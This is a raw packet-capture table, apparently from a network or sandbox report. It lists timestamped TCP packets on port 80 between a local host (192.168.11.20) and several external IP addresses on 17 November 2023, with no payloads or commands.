                                                                                                                                                                                                Nov 17, 2023 19:31:13.039793015 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.039948940 CET5018480192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:13.041258097 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.041328907 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.041377068 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.041424990 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.086323977 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.137962103 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.138519049 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.138834000 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.138889074 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.139662027 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.139760971 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.360464096 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:13.360635042 CET8050184104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:15.362193108 CET5018580192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:15.460117102 CET8050185104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:15.460442066 CET5018580192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:15.460530043 CET5018580192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:15.559746981 CET8050185104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:15.717394114 CET8050185104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:15.717855930 CET8050185104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:15.718178034 CET5018580192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:15.718178988 CET5018580192.168.11.20104.21.52.182
                                                                                                                                                                                                Nov 17, 2023 19:31:15.819942951 CET8050185104.21.52.182192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:23.766870022 CET5018680192.168.11.20104.21.46.236
                                                                                                                                                                                                Nov 17, 2023 19:31:23.864703894 CET8050186104.21.46.236192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:23.865200043 CET5018680192.168.11.20104.21.46.236
                                                                                                                                                                                                Nov 17, 2023 19:31:23.865303040 CET5018680192.168.11.20104.21.46.236
                                                                                                                                                                                                Nov 17, 2023 19:31:23.963042021 CET8050186104.21.46.236192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499762058 CET8050186104.21.46.236192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499849081 CET8050186104.21.46.236192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499902010 CET8050186104.21.46.236192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:24.499952078 CET8050186104.21.46.236192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:24.500277042 CET5018680192.168.11.20104.21.46.236
                                                                                                                                                                                                Nov 17, 2023 19:31:24.500277042 CET5018680192.168.11.20104.21.46.236
                                                                                                                                                                                                Nov 17, 2023 19:31:24.500570059 CET5018680192.168.11.20104.21.46.236
                                                                                                                                                                                                Nov 17, 2023 19:31:24.598160982 CET8050186104.21.46.236192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:37.669926882 CET5018780192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:37.856666088 CET805018791.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:37.857131958 CET5018780192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:37.857218981 CET5018780192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:38.045366049 CET805018791.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:38.045433044 CET805018791.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:38.045658112 CET5018780192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:39.372390985 CET5018780192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:40.388051987 CET5018880192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:40.574953079 CET805018891.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:40.575293064 CET5018880192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:40.575499058 CET5018880192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:40.766360044 CET805018891.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:40.766438007 CET805018891.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:40.766729116 CET5018880192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:42.090615988 CET5018880192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.106219053 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.293852091 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.294070005 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.295444965 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.484939098 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485022068 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485081911 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485158920 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485213995 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485265017 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485375881 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485491037 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485538006 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485599995 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485815048 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.485887051 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486054897 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486221075 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.486392021 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.673629045 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.673724890 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.673768044 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.673955917 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.674063921 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:43.674117088 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.674376011 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.674887896 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.674930096 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.675525904 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.675580978 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.861588955 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.861747026 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.862046003 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.862404108 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.862838984 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.862875938 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.862904072 CET805018991.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:43.863049984 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:44.808799028 CET5018980192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:45.824354887 CET5019080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:46.010787010 CET805019091.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:46.011324883 CET5019080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:46.013465881 CET5019080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:46.201169968 CET805019091.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:46.201256037 CET805019091.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:46.201739073 CET5019080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:46.201739073 CET5019080192.168.11.2091.195.240.123
                                                                                                                                                                                                Nov 17, 2023 19:31:46.389827967 CET805019091.195.240.123192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:51.213895082 CET5019180192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:51.379014969 CET805019138.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:51.379250050 CET5019180192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:51.379434109 CET5019180192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:51.544491053 CET805019138.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:51.546437025 CET805019138.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:51.546516895 CET805019138.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:51.546818972 CET5019180192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:52.885169983 CET5019180192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:53.901031017 CET5019280192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:54.068026066 CET805019238.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:54.068270922 CET5019280192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:54.068592072 CET5019280192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:54.233652115 CET805019238.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:54.234873056 CET805019238.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:54.234951019 CET805019238.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:54.235281944 CET5019280192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:55.571939945 CET5019280192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.587656975 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.756853104 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.757086992 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.758397102 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.758477926 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924105883 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924204111 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924252987 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924401045 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924521923 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924591064 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924851894 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924902916 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.924904108 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925096989 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925143003 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925195932 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925241947 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925251961 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925431013 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:56.925539017 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091048002 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091069937 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091309071 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091320992 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091341019 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091356993 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091490984 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091598988 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091660976 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091814995 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091841936 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.091861010 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.092175007 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.092195034 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.092209101 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.092464924 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.092799902 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.092818975 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.092833996 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.093115091 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.093477011 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.093512058 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.093530893 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.256671906 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.256793022 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.256841898 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.256892920 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.256958961 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.257006884 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.257051945 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.257991076 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.258061886 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.258110046 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.258157015 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.258203030 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.259959936 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.260036945 CET805019338.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:57.260341883 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:58.258989096 CET5019380192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:59.274552107 CET5019480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:59.439970970 CET805019438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:59.440215111 CET5019480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:59.440315008 CET5019480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:59.606851101 CET805019438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:59.607578039 CET805019438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:59.607662916 CET805019438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:31:59.607944965 CET5019480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:59.608012915 CET5019480192.168.11.2038.59.48.86
                                                                                                                                                                                                Nov 17, 2023 19:31:59.773349047 CET805019438.59.48.86192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:04.617039919 CET5019580192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:04.787039995 CET8050195209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:04.787317038 CET5019580192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:04.787533998 CET5019580192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:04.958534956 CET8050195209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:04.959074020 CET8050195209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:04.959145069 CET8050195209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:04.959325075 CET5019580192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:06.288522005 CET5019580192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:07.304111004 CET5019680192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:07.473412037 CET8050196209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:07.473756075 CET5019680192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:07.473860025 CET5019680192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:07.643136024 CET8050196209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:07.643496037 CET8050196209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:07.643558025 CET8050196209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:07.643934011 CET5019680192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:08.975373983 CET5019680192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:09.990941048 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.159853935 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.160397053 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.161752939 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333139896 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333220959 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333280087 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333364010 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333405972 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333417892 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333472013 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333523989 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333538055 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333578110 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333611012 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.333842993 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503241062 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503315926 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503365040 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503410101 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503493071 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503540993 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503679037 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503804922 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503860950 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:10.503937960 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.504005909 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.504096985 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.504143000 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.504352093 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.504585981 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.504632950 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.504851103 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.505145073 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.505192041 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.673424959 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.673628092 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.673696041 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.673899889 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.673949957 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.674164057 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.674523115 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.674576998 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.674837112 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.675030947 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.675302029 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.675350904 CET8050197209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:10.675492048 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:11.662305117 CET5019780192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:12.677748919 CET5019880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:12.847711086 CET8050198209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:12.848063946 CET5019880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:12.848064899 CET5019880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:13.018114090 CET8050198209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:13.018312931 CET8050198209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:13.018366098 CET8050198209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:13.018662930 CET5019880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:13.018719912 CET5019880192.168.11.20209.182.252.245
                                                                                                                                                                                                Nov 17, 2023 19:32:13.189740896 CET8050198209.182.252.245192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:18.020456076 CET5019980192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:19.035588026 CET5019980192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:19.415963888 CET805019938.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:19.416189909 CET5019980192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:19.416305065 CET5019980192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:19.796578884 CET805019938.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:20.925856113 CET5019980192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:21.941379070 CET5020080192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:22.050465107 CET5019980192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:22.427741051 CET805019938.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:22.766515017 CET805019938.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:22.766863108 CET5019980192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:22.956554890 CET5020080192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:23.330355883 CET805020038.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:23.330712080 CET5020080192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:23.330815077 CET5020080192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:24.831331015 CET5020080192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:25.846800089 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:26.225486040 CET805020138.163.97.8192.168.11.20
                                                                                                                                                                                                Nov 17, 2023 19:32:26.225950956 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:26.227411032 CET5020180192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:26.330941916 CET5020080192.168.11.2038.163.97.8
                                                                                                                                                                                                Nov 17, 2023 19:32:26.708343029 CET805020038.163.97.8192.168.11.20
